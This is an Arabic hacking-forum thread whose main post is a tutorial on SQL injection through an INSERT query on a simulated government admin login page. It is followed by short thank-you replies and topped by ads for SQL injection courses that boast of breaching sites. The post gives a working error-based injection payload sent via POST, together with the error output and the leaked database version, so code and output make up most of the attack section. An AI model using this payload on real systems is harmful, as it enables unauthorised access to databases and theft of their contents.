1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ درس ] الحقن في استعلام insert

الموضوع في '[ SQL-injection ]' بواسطة ZeRo TiMe, بتاريخ ‏26 أكتوبر 2013.

كاتب الموضوع : ZeRo TiMe المشاهدات : 949 الردود : 7 ‏26 أكتوبر 2013
حالة الموضوع:
مغلق
  1. غير متصل

    ZeRo TiMe
    rank
    Developer

    عضو منذ:
    ‏20 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الإقامة:

    السلام عليكم ورحمة الله

    اولا الفكرة محاكاة لموقع حكومي.. اقول فكرة وليس شرح .. فكرة الحقن استعلام insert

    معنا موقع مصاب في لوحة التحكم :

    كود PHP:
    www.site.gov.com/admin/login.php
    نضع ' في خانة اليوزر والباس :

    يظهر لنا خطأ :

    كود PHP:
    INSERT INTO project_user_logins (project_id,username,password,server_name,server_address,remote_address,succed,tsVALUES ('14'''', ''''www.site.gov.com''127.0.0.1''127.0.0.1''0''1382008397'You have an error in your SQL syntaxcheck the manual that corresponds to your MySQL server version for the right syntax to use near '\'''www.site.gov.com''127.0.0.1''127.0.0.1''0''1382008397'at line 1
    كما تلاحظون خانة ليوزر ليس عليها حماية addslashes اما خانة الباس فعليها حماية

    راح نستفيد من خانة اليوزر

    اول شيىء لو تلاحظ راح تشوف insert INTO

    هذا استعلام لإضافة شيىء الى القاعدة وبالأخص الجدول project_user_logins فيه 8 اعمدة :

    كود PHP:
    INSERT INTO project_user_logins (project_id,username,password,server_name,server_address,remote_address,succed,ts
    )

    والقيم الـ 8 :

    كود PHP:
    VALUES ('14'''', ''''www.site.gov.com''127.0.0.1''127.0.0.1''0''1382010385')
    اول قيمة هي 14 ثابتة وتخص العمود project_id يبقى امامنا 7 قيم

    احنا نستغل خانة اليوزر ونضع 7 قيم ثم فاصلة ثم استعلام الحقن .

    راح يكون الحقن هكذا :

    ملاحظة : الحقن عبر عملية POST ونوع الحقن ايرور بازد ..

    نضع في خانة اليوزر الآتياول قيمة هي 14 ثابتة وتخص العمود project_id يبقى امامنا 7 قيم

    احنا نستغل خانة اليوزر ونضع 7 قيم ثم فاصلة ثم استعلام الحقن .

    راح يكون الحقن هكذا :

    ملاحظة : الحقن عبر عملية POST ونوع الحقن ايرور بازد ..

    نضع في خانة اليوزر الآتي

    كود PHP:
    dz','1','2','3','4','5','6),((select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a))%23
    كل ما فعلناه اعطينا 7 قيم اللي يحتاجها الإستعلام ،، غلقنا الإستعلام بقوس
    ثم فاصلة : واستعلام جديد بين قوسين وفي الأخير عملنا تعليق ..

    وهذا شكل الإستعلام :

    كود PHP:
    INSERT INTO project_user_logins (project_id,username,password,server_name,server_address,remote_address,succed,tsVALUES ('14'''),((select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a))#', '', 'www.site.gov.com', '127.0.0.1', '127.0.0.1', '0', '1382010687') Duplicate entry '5.1.41-debug-log1' for key 'group_key
    '

    صورة :

    [​IMG]

    النتيجة :

    كود PHP:
    Duplicate entry '5.1.41-debug-log1' for key 'group_key'
    طبعا مش محتاجة تستعلم عن الجداول فهي امامك في الخطا .. فكرة الحقن استعلام insert

    الموضوع لسبب تعليمي فقط .. &:"

    تحميل الشرح

    [hide]
    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
    [/hide]

    )5:"​
     


    جاري تحميل الصفحة...
  2. غير متصل

    Crazy BoOoy
    rankrank
    Developer

    عضو منذ:
    ‏1 نوفمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    11
    نقاط الجائزة:
    الوظيفة:
    طالب
    الإقامة:

    رد: الحقن في استعلام insert

    الله يعطيك الف عافية اخي العزيز,
     


  3. غير متصل

    كلآشنكوف
    Developer

    عضو منذ:
    ‏19 يوليو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:

    رد: الحقن في استعلام insert

    تسلم ايدك مبدع
     


  4. غير متصل

    salem k
    rank
    Developer

    عضو منذ:
    ‏10 ديسمبر 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: الحقن في استعلام insert

    تسلم ايدك تسلم ايدك
     


  5. غير متصل

    cute hacker
    rank
    Developer

    عضو منذ:
    ‏28 يونيو 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: الحقن في استعلام insert

    thannnnnnnnnnnnnnnnnki:q^:
     


  6. غير متصل

    X444X TEAM
    rank
    Developer

    عضو منذ:
    ‏30 يوليو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:

    رد: الحقن في استعلام insert

    مشكور حبيبي
    جاري التقيم ان امكن[واصل ابداعكـً#ٌ5oًًًُ.]
     


  7. غير متصل

    HaMaM-HaCkEr
    DeveloPer Plus

    عضو منذ:
    ‏22 نوفمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: الحقن في استعلام insert

    عليكم السلام ورحمة الله وبركاته

    باركـ الله فيك اخي وبمجهودك

    وفقك الله ,,,
     


  8. غير متصل

    الديلر الفلسطيني
    rank
    Developer

    عضو منذ:
    ‏14 يناير 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: الحقن في استعلام insert

    كفو ياا بطل
     


حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...